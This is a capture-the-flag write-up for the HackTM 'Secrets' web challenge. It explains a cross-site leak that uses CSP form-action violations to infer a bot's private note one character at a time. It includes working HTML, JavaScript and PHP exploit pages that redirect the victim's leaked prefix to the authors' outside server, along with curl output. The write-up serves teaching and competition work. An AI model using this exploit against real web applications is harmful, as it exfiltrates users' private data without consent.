+++  
author = "xanhacks"  
title = "Exfiltration of secrets using an XS-Leaks - HackTM Secrets"
date = "2023-02-19"
description = "Exfiltrate the note from the bot using an XS-Leaks technique called 'Cross-Origin Redirects and CSP Violations'"
tags = [  
	"web",
	"xs-leaks"
]
categories = [  
	"web"
]  
slug = "secrets-hacktmctf"
image = "/img/secrets-hacktmctf/banner.png"  
+++

# Secrets - HackTM CTF Writeup

In this article we will solve the final web challenge of the [HackTM CTF](https://ctf.hacktm.ro/). The challenge **Secrets**, is a private note application. We do not have the source code of it.

Here is the preview of the challenge which has been solved only by 9 teams.

![Secrets challenge](/img/secrets-hacktmctf/challenge_desc.png)

![Secrets solves](/img/secrets-hacktmctf/challenge_solves.png)

> Flaggers: [xanhacks](https://twitter.com/xanhacks) and [overflow](https://twitter.com/revoverfl0w) from [Hexagon](https://hexag0n.fr/) team.

## TL;DR

The goal was to exfiltrate the note from the bot using an XS-Leaks technique called "Cross-Origin Redirects and CSP Violations".

## Overview

Here is the note application. First, we can register and then log on to the website.

![Secrets application](/img/secrets-hacktmctf/website.png)

After the login, we notice that the application allows us to:

- Create notes
- Search for our notes
- Report a URL to an admin (bot)

We can create a simple note and view it on the home page:

![Create note](/img/secrets-hacktmctf/add_note.png)

![List notes](/img/secrets-hacktmctf/list_notes.png)

The search functionality has two behaviours depending on the success of the query. Here is an example with a valid and invalid search query on our example note:

1. On the **right**, a **valid** query because the 'example' word **contains** the letter 'e'.
2. On the **left**, an **invalid** query because the 'example' word does **not contain** the letter 'Z'.

![View requests](/img/secrets-hacktmctf/view_requests.png)
![View responses](/img/secrets-hacktmctf/view_responses.png)

> You can use the Burpsuite `Comparer` tab to reproduce this view.

A notable difference in the 2 HTTP responses is that the redirection is not on the same path, and especially, not on the same domain (`results.wtl.pw` and `secrets.wtl.pw`).

- Valid query: `http://results.wtl.pw/results?ids=<note_uuid>&query=<query>`
- Invalid query: `http://secrets.wtl.pw/#<query>`

In addition, the attributes of the session cookie are not very secure:

- `SameSite: None`: The cookie will be attached from a request send from every site.
- `Secure: false`: The cookie can be used by an HTTP server (no HTTP**S** requirement).

All these conditions lead us to believe that the goal of the challenge is to exfiltrate the bot's notes using an XS-Leaks vulnerability.

> Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms to infer information about the user. Source [xsleaks.dev](https://xsleaks.dev/).

## Exploitation

To exfiltrate the flag, we tried to use the following 2 XS-Leaks techniques:

1. [History Length with same URL](https://book.hacktricks.xyz/pentesting-web/xs-search#history-length-with-same-url).
2. [Cross-Origin Redirects and CSP Violations](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects) .

Unfortunately, the first technique only worked on our browsers and not the bot. So we will explore the second one.

The goal of the second technique is to use [CSP (Content-Security-Policy)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) to block one domain on both, `results.wtl.pw` and `secrets.wtl.pw`. If the blocked domain is requested by the victim, the Javascript event `securitypolicyviolation` will be triggered.

We can therefore detect whether a domain has been visited by the bot or not during a search via a form submission by monitoring the [form-action](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action) CSP directive.

Here is an example:

```html
<!-- Set the Content-Security-Policy to only allow secrets.wtl.pw -->
<meta http-equiv="Content-Security-Policy" content="form-action http://secrets.wtl.pw">
<form action="http://secrets.wtl.pw/search" method="GET">
    <input type="text" name="query" value="HackTM{">
</form>

<script>
// Listen for a CSP violation event
document.addEventListener('securitypolicyviolation', () => {
    // Valid search query will be catch here
    console.log("Detected a redirect to somewhere other than secrets.wtl.pw");
});
// Try to get secrets.wtl.pw via a form. If it redirects to another cross-site website
// it will trigger a CSP violation event
document.forms[0].submit();
</script>
```

To extract the flag more quickly, we used a recursion technique implemented with PHP :

```html
<?php
$test = isset($_GET['test']) ? $_GET['test'] : '';
$flag = isset($_GET['flag']) ? $_GET['flag'] : '';

if (!substr($flag, 0, strlen($flag)) === substr("HackTM{", 0, strlen($flag))) {
    die();
}
if (!substr($test, 0, strlen($test)) === substr("HackTM{", 0, strlen($test))) {
    die();
}
?>

<?php if ($flag !== ''): ?>
<script>
let charset = "abcdefghijklmnopqrstuvwxyzHTM0123456789{}_";
for (let i = 0; i < charset.length; i++) {
    window.open("http://xpl.xanhacks.xyz/?test=" + "<?= $flag ?>" + charset[i]);
}
</script>
<?php endif; ?>
<?php if ($flag !== '') { die(); } ?>

<meta http-equiv="Content-Security-Policy" content="form-action http://secrets.wtl.pw">
<form action="http://secrets.wtl.pw/search" method="get">
    <input type="text" name="query" value="<?= $test ?>">
</form>

<script>
    document.addEventListener('securitypolicyviolation', () => {
        window.location.href="http://xpl.xanhacks.xyz/?flag=<?= $test ?>";
    });
    document.forms[0].submit();
</script>
```

When testing a search, the form will be sent. In case of success, the bot is redirected with a `?flag=` parameter containing the value of the search.

```html
$ curl 'http://xpl.xanhacks.xyz?test=HackTM{test_flag_'
<meta http-equiv="Content-Security-Policy" content="form-action http://secrets.wtl.pw">
<form action="http://secrets.wtl.pw/search" method="get">
    <input type="text" name="query" value="HackTM{test_flag_">
</form>

<script>
    document.addEventListener('securitypolicyviolation', () => {
        window.location.href="http://xpl.xanhacks.xyz/?flag=HackTM{test_flag_";
    });
    document.forms[0].submit();
</script>
```

If our server is reached with the flag parameter, it will start the recursion by opening a window for each new character to test.

```html
$ curl 'http://xpl.xanhacks.xyz?flag=HackTM{pwnd_by_xs'
<script>
let charset = "abcdefghijklmnopqrstuvwxyzHTM0123456789{}_";
for (let i = 0; i < charset.length; i++) {
    window.open("http://xpl.xanhacks.xyz/?test=" + "HackTM{pwnd_by_xs" + charset[i]);
}
</script>
```

Finally, we send the URL of our server to the bot and wait for the flag.

![Reports URL](/img/secrets-hacktmctf/report.png)

The flag appears progressively on our server :

![Exfil flag](/img/secrets-hacktmctf/exfil_flag.png)
![Show flag](/img/secrets-hacktmctf/show_flag.png)

> It was a bit complicated to exiltrate the flag as the `_` character match every chars.

And we get the flag **HackTM{pwnd_by_xsleaks_2d11eb9b}** !!!
